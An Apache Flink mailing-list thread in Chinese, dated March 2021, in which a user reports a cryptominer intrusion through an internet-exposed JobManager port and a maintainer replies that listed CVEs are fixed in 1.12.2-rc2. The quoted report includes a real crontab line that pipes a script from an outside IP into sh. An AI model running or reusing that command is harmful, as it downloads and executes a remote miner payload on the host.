Hi, 从上述描述上看,并不能确认是Flink的安全漏洞,建议进行更多测试,确认之后再向Flink社区报告。
近期已知的Flink安全漏洞包括CVE-2020-1960 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1960>, CVE-2020-17518 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17518>和 CVE-2020-17519 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17519> [1],可以确认这些漏洞在1.12.2-rc2中已全部修复,且不存在regression。 Best Regards, Yu [1] https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=apache+flink On Tue, 2 Mar 2021 at 09:48, macdoor <[email protected]> wrote: > 我自己编译 > https://github.com/apache/flink/archive/release-1.12.2-rc2.tar.gz > ,然后部署在了服务器上,为了更新操作系统补丁,绑定了公网ip,这时 > jobmanager 的 8081 端口就暴露在互联网上了,然后就有挖矿程序来了,在crontab 中增加了这行 > * * * * * curl http://195.3.146.118/spr.sh | sh > /dev/null 2>&1 > > 之前使用 1.10时也遇到过类似情况,我记得 1.12 似乎没有这个问题了,所以这次没有留意,就过有发生了,我基本可以确定是 flink > 引起的,因为服务器是全新安装的,只启动了 flink 进程 > > > > -- > Sent from: http://apache-flink.147419.n8.nabble.com/
